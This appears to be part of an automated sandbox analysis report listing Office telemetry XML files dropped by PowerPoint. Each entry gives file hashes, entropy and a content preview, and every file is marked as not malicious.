                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.895259032059607
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9d1F5DPuct1k3BNjXMi+EsdnKE+2h6wl/FfSoiD:cBvPucteNjXMzbdKshBdqoiD
                                                                                                                              MD5:C4069B4A7EAA85DEBF9149CC4F611A1E
                                                                                                                              SHA1:4E41E49FE3F8F9C33121664783049831AD8DEEDA
                                                                                                                              SHA-256:7FEFF4A2068F486999519CA82547F08C6C10B28B9AC8BF62D8CF503B1EE5EB7E
                                                                                                                              SHA-512:089F8A6D741A55AD798F2B07E940CBFE9C339E7751C88979C7237270750FC8E61268D81BBAA0DD25EDAC155646CD68004C6CFE2817B6865AF685903076B11C56
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701401" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Feedback.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFeedback" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.851189495849424
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9jsD4uMt1k3BNjXMi+EsdnKE+2h6wl/FfZl94dl:cZA4uMteNjXMzbdKshBdlWl
                                                                                                                              MD5:50655123E33AFFD5929AF51CDD7F910D
                                                                                                                              SHA1:C55BC2D107AC025AA86B83F25A92BB4E047CA7A4
                                                                                                                              SHA-256:403E85A8659EC5EC09EC28C48CCD7018980BF907974A5A823CC61FD4CA6376C5
                                                                                                                              SHA-512:2210958C932CBC3CA733A7754975261195B1C7A2189179BD699641A17426625F4D10616536C7827F8E10FC6226CF6F82F8207C000F52CB59E7EA063624A9975A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.885644101734657
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d94gD4uct1k3BNjXMi+EsdnKE+2h6wl/FfZl94dl:cek4ucteNjXMzbdKshBdlWl
                                                                                                                              MD5:7EE84B67DA2B177BB9F7970E17EFDFA3
                                                                                                                              SHA1:09D0F753289494D6AA385531DB8FD9D65B320B9F
                                                                                                                              SHA-256:94558DDF61F07FDE04A9F64B2FE3089B1387D04AE32B74AA40F6380157333A9C
                                                                                                                              SHA-512:8A7986847A0262983EEEA11DE5740044270F8AB165DB15C9236CE6391AB9A2D1BAA6B75064ACC17B09FC0229F454876027D7F7BC7E75F6F4D5381E16E73BF41E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1367
                                                                                                                              Entropy (8bit):4.867050300290955
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9WEBDY5BuMt1k3BNjXMi+EsdnKE+2h6wl/FfdNG:cEExY5BuMteNjXMzbdKshBdrG
                                                                                                                              MD5:D3581FFA64962E5B3A88823EEB2C7E13
                                                                                                                              SHA1:E7165CDFF344D68D415818BDFDA28335055AD58C
                                                                                                                              SHA-256:4BF376373582C62D9CFA456B49563FDFFC18AF24863569E58A33460C9C4FF9EC
                                                                                                                              SHA-512:6AE2D062A67C56BF0D7D23B033B96EF452148F6CB44BB965F07A592948CA06B3A1C03C16713FC4CFC2B7A12780ABDFED1BC4571A2799FEFC0523FE9F91894C02
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ClickToRun" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenClickToRun" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.901397951222752
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9RELDY5Buct1k3BNjXMi+EsdnKE+2h6wl/FfdNG:cPE3Y5BucteNjXMzbdKshBdrG
                                                                                                                              MD5:45C8ADC97B153AD4E7C9F7CD20C7C596
                                                                                                                              SHA1:3D339434F78E7B46650B20AC2203512E9651F00A
                                                                                                                              SHA-256:1644BC64BACC9EA3CB3A0D7700444BA620C781921B790B3304FBBA5C3E3A23C2
                                                                                                                              SHA-512:C1C1784CB97B45842CEA7CFA77750185F1350B9CB1F275CDB59A1FFB6FAF6DC59BC318F910A22CA4EEFB97277AD2CF1A3016BB4B09E4F11E9FD0E5E534F16ECB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ClickToRun.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenClickToRun" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1371
                                                                                                                              Entropy (8bit):4.87143922286121
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d93AcqUDcczuMt1k3BNjXMi+EsdnKE+2h6wl/FfbWd:cJA3IcEuMteNjXMzbdKshBdzu
                                                                                                                              MD5:C5425337BB1BD1AE05FCD194702CE5E8
                                                                                                                              SHA1:A46BD1FDD5DF067614FBB385874C7532C936A6AD
                                                                                                                              SHA-256:00E3250D9C0B3EC068EBFB018C6BC8AD65672B0C3146A42ED23F824011232599
                                                                                                                              SHA-512:6AEE85BFF6C2A6406DFB311A5E0E32774F4A25B49AAF89A4B3AE652FA5CAD1E8B5A57833B795F1C297210D85C7CD0E05E09980E212F25F41AF0724526C8EF85D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ActivityFeed" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenActivityFeed" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1408
                                                                                                                              Entropy (8bit):4.9044836874199635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d90jAcLDcczuct1k3BNjXMi+EsdnKE+2h6wl/FfbWd:cOAscEucteNjXMzbdKshBdzu
                                                                                                                              MD5:86B949CE5600C4EA98588727559FA6A2
                                                                                                                              SHA1:18510336146B37806CC5959D9C6262B557426513
                                                                                                                              SHA-256:297C295BEE147DEE6EC4B606127F0A4CF506537A9C953E79C38AD1FD88E0E375
                                                                                                                              SHA-512:4A747163E5E11FF4E25F2489DCF276A2AA6C1A2D258927314BDD39CE5B36F7C6A4976F350312AC7D69EAA9BC7A04DD148F178D1C420976A578762502858C80BB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ActivityFeed.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenActivityFeed" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1385
                                                                                                                              Entropy (8bit):4.869280310390715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9FC8fDW8NuMt1k3BNjXMi+EsdnKE+2h6wl/FfiyO:c3n9uMteNjXMzbdKshBd6yO
                                                                                                                              MD5:B4FFA67DBCA2C36C65CF2CEC21C194AF
                                                                                                                              SHA1:91AF529A50648564FB4E7AE434F33236842096C3
                                                                                                                              SHA-256:AE3DC19A7465F1504949B7482CFEA3D7FE7A6E168972227DFC12D76BF73A6DBE
                                                                                                                              SHA-512:16579529198940AAC23986E9EA3D4DD99B39982E8CEE751E06CBB6A8767EC5A4CC5AA40A5566A30755C756346EFB8CB85CAE873FD53ED780C08050A45FEEAA1A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701700" V="1" DC="SM" EN="Office.Telemetry.Event.Office.IntelligentServices" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenIntelligentServices" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1422
                                                                                                                              Entropy (8bit):4.901909400554976
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d96C8tDW8Nuct1k3BNjXMi+EsdnKE+2h6wl/FfiyO:csJ9ucteNjXMzbdKshBd6yO
                                                                                                                              MD5:0DC5F0FD97C8670F3FAEC6EA67CE413E
                                                                                                                              SHA1:E099D77DBF97E2FCECB3CA5F81658B4D8670F8ED
                                                                                                                              SHA-256:952718E98154DA263DB3F4310FBF492D9133306B43FA85F5B246683F966DE924
                                                                                                                              SHA-512:8A3D80F49F59BCD5A773CF94C55171002AF9748D919F2D4B866DED4B8E2D41F56023CDD22D8D0103E8C2B4D6A5EE4F704116E297CF913433D07C58568A2EE45B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701701" V="1" DC="SM" EN="Office.Telemetry.Event.Office.IntelligentServices.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenIntelligentServices" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventCo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1363
                                                                                                                              Entropy (8bit):4.855593221051942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9o4D52uMt1k3BNjXMi+EsdnKE+2h6wl/FfiDR6j9:cic52uMteNjXMzbdKshBdoR6J
                                                                                                                              MD5:92A739745511ED4C0C1D45D82C77658D
                                                                                                                              SHA1:5CC7B83D590F7738D647FA4F523CEE679125943C
                                                                                                                              SHA-256:B6D3E25D682C863466B53086C5DAB1523408F587D0ECC9C1B9E29274879F1717
                                                                                                                              SHA-512:5275E7B7BD85BDC8E4CBB826B135D12AACD74F4A6E0195D01E0B1FC9B879FAFD8541DEF44739BFC052C950D26AF3CE3B86C0849A15C240F2A6950ACE25B87A51
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AirSpace" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAirspace" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.889762408334574
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9T8D52uct1k3BNjXMi+EsdnKE+2h6wl/FfiDR6j9:ctw52ucteNjXMzbdKshBdoR6J
                                                                                                                              MD5:DC9D9CFCF426D0CEFE55DE1849D2DCC7
                                                                                                                              SHA1:450A7A6D23546C99218403C136622DE77F2F704F
                                                                                                                              SHA-256:2D5479AA25459D68178F9DA0E51522F6365DDAE4B88E0ED74CFD6EDF98BE8DCC
                                                                                                                              SHA-512:86336F858EBBC92C5928053360B53F92FC96A10999157652424D7CC98253324B1FC7DF5E4E5BEF3A89824F3D62CBE8FE16FA15BF9E875D712CD605D8AA1AB973
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AirSpace.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAirspace" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.861678713883639
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9MISDtuMt1k3BNjXMi+EsdnKE+2h6wl/FfH3/j+:c6IytuMteNjXMzbdKshBdy
                                                                                                                              MD5:09F6C193C63584980525CCEB8AD3DE1C
                                                                                                                              SHA1:51A0723A0DF9354146A1A98C31A144AD4FEAFB99
                                                                                                                              SHA-256:20CBFF7F69A6F9950FD9CFDE3A060078AD35FE8BFF36E5CE6ABEB8EC79C2425D
                                                                                                                              SHA-512:B3BE6EA621D5F874D06225DED34365728A65ED9B1AF2045D06C5C46BD30B0A39028A452438BCB43080B61C9D714BE0AF1940B7E78E16F289B66073011BADB9E1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenResources" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.8964391267970955
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9XIKDtuct1k3BNjXMi+EsdnKE+2h6wl/FfH3/j+:cFIKtucteNjXMzbdKshBdy
                                                                                                                              MD5:30C63769311E091B113962414D87C0F6
                                                                                                                              SHA1:5A296B9CE8814B2D69507A596B4FF52E8E7B4F03
                                                                                                                              SHA-256:F0920A54B5440E436A5467F531E6E39847AB8D49DDC947F3CC6ADFC3132DABB6
                                                                                                                              SHA-512:2F7A0C3C415F06E5B73F347E428330EACF9BBAFCD4E5A9FF0918E5BF1E43D8E006D6FB2FE6C0BD525606C1CC51D1AF485EFDE8DF89AABF3D49EE93E2052EA11B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenResources" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1370
                                                                                                                              Entropy (8bit):4.863237258346602
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zFbD0auMt1k3BNjXMi+EsdnKE+2h6wl/FfnSip:cPn0auMteNjXMzbdKshBd/SU
                                                                                                                              MD5:FF99C0CD717BEC9058D85C1CED6F4360
                                                                                                                              SHA1:8DD634D41C3706CCDEBCD0B6F5DDCF5F08C93610
                                                                                                                              SHA-256:3D7510364704F1B2F2BC376D618C449298D86AB18536F08E5146A17881035A79
                                                                                                                              SHA-512:ABB7B2E0304D80EDF3FCCD696E6E1D61C5957FA43F03CA08A1DA5A79815BADFFFE1761C3E8F9DCC03B9A6923ADE1D656567320C9E04F1D94FB9E0E597135244D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="701850" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Mobile" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelMobile" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1407
                                                                                                                              Entropy (8bit):4.897385308857073
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9z6ZD0auct1k3BNjXMi+EsdnKE+2h6wl/FfnSip:cEJ0aucteNjXMzbdKshBd/SU
                                                                                                                              MD5:11905A5A24EABADC513921F6C88E04B8
                                                                                                                              SHA1:9752BD755BA4CDAF81154A6A840F15FFFF01637A
                                                                                                                              SHA-256:D558157AE718D287481689C47D0B5E7DF83C74EDC9388F7E33A57AF2813EA3DA
                                                                                                                              SHA-512:8F078265587E1C14FC20B5DF6A5DA38F356BEF1918F6D624D7E1B2BE4ACA9C847ABB7D5AE1B5747A352F683F4608AD782122D896654BC9C8E0FC3F8E2B88C1B9
                                                                                                                              Malicious:false
